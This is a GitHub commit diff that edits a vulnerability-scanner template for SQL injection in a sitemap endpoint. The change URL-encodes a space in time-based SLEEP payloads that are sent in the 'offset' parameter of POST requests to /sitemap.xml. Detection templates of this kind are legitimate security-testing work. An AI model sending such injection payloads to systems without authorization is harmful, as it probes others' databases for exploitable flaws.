Update sitemap-sql-injection.yaml

patch-1
J4vaovo 2023-07-13 13:53:05 +08:00 committed by GitHub
parent a068bf6283
commit 94f55f8141
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -14,12 +14,12 @@ http:
- raw:
- |
@timeout: 15s
POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356)# HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 25s
POST /sitemap.xml?offset=1;SELECT IF((SLEEP(16)),1,2356)# HTTP/1.1
POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356)# HTTP/1.1
Host: {{Hostname}}
matchers-condition: and